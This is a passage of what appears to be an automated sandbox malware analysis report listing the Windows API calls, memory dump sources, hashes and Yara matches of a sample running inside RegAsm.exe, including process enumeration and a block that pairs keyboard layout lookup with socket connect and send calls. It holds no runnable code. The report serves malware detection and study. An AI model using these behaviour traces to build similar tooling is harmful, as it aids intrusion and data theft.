                                                          • _free.LIBCMT ref: 00444E1D
                                                          • _free.LIBCMT ref: 00444E3C
                                                          • _free.LIBCMT ref: 00444E57
                                                          • _free.LIBCMT ref: 00444E6E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 3033488037-0
                                                          • Opcode ID: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                                                          • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                                          • Opcode Fuzzy Hash: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                                                          • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                                          APIs
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                          • _free.LIBCMT ref: 004493BD
                                                            • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 00449589
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                          • String ID:
                                                          • API String ID: 1286116820-0
                                                          • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                          • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                                          • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                          • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                                          APIs
                                                            • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                            • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                                            • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                                            • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 2180151492-0
                                                          • Opcode ID: 8b8cdfc602dbd14a3ce60d1437fbf9c616907d32c1791499aac7107a218dc19c
                                                          • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                                          • Opcode Fuzzy Hash: 8b8cdfc602dbd14a3ce60d1437fbf9c616907d32c1791499aac7107a218dc19c
                                                          • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                          • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                                          • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                          • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                                          • __alloca_probe_16.LIBCMT ref: 004511B1
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                                          • __freea.LIBCMT ref: 0045121D
                                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                          • String ID:
                                                          • API String ID: 313313983-0
                                                          • Opcode ID: 96f15bfe140a09faeb809ebc5c29b58b41f03d59f1561ac9dee06a5207780793
                                                          • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                                          • Opcode Fuzzy Hash: 96f15bfe140a09faeb809ebc5c29b58b41f03d59f1561ac9dee06a5207780793
                                                          • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                                          • _free.LIBCMT ref: 0044F3BF
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          • Opcode ID: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                                                          • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                                          • Opcode Fuzzy Hash: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                                                          • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                          • _free.LIBCMT ref: 100071B8
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                          • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                          • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                          • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                          • _free.LIBCMT ref: 10005BB4
                                                          • _free.LIBCMT ref: 10005BDB
                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                          • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                          • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                          • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                          APIs
                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                          • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandleOpen$FileImageName
                                                          • String ID:
                                                          • API String ID: 2951400881-0
                                                          • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                          • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                                          • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                          • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                          • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                          • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$lstrcat
                                                          • String ID:
                                                          • API String ID: 493641738-0
                                                          • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                          • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                          • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                          • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                          APIs
                                                          • _free.LIBCMT ref: 004509D4
                                                            • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 004509E6
                                                          • _free.LIBCMT ref: 004509F8
                                                          • _free.LIBCMT ref: 00450A0A
                                                          • _free.LIBCMT ref: 00450A1C
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                          • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                          • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                                          APIs
                                                          • _free.LIBCMT ref: 100091D0
                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                          • _free.LIBCMT ref: 100091E2
                                                          • _free.LIBCMT ref: 100091F4
                                                          • _free.LIBCMT ref: 10009206
                                                          • _free.LIBCMT ref: 10009218
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                          • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                          • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                          • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                          APIs
                                                          • _free.LIBCMT ref: 00444066
                                                            • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 00444078
                                                          • _free.LIBCMT ref: 0044408B
                                                          • _free.LIBCMT ref: 0044409C
                                                          • _free.LIBCMT ref: 004440AD
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                          • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                          • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                                          APIs
                                                          • _free.LIBCMT ref: 1000536F
                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                          • _free.LIBCMT ref: 10005381
                                                          • _free.LIBCMT ref: 10005394
                                                          • _free.LIBCMT ref: 100053A5
                                                          • _free.LIBCMT ref: 100053B6
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                          • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                          • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                          • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                          APIs
                                                          • _strpbrk.LIBCMT ref: 0044E738
                                                          • _free.LIBCMT ref: 0044E855
                                                            • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                                            • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                                            • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                          • String ID: *?$.
                                                          • API String ID: 2812119850-3972193922
                                                          • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                          • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                                          • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                          • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                                          APIs
                                                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00F780A0,00000010), ref: 004048E0
                                                            • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                          • String ID: XQG$NG$PG
                                                          • API String ID: 1634807452-3565412412
                                                          • Opcode ID: ac79876b8c032ef2f2c5b8a593317c1009f428034ef9e67eee246b9d8226e0d0
                                                          • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                                          • Opcode Fuzzy Hash: ac79876b8c032ef2f2c5b8a593317c1009f428034ef9e67eee246b9d8226e0d0
                                                          • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: `#D$`#D
                                                          • API String ID: 885266447-2450397995
                                                          • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                          • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                                          • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                          • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
                                                          • _free.LIBCMT ref: 00443540
                                                          • _free.LIBCMT ref: 0044354A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          • API String ID: 2506810119-1068371695
                                                          • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                          • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                                          • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                          • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
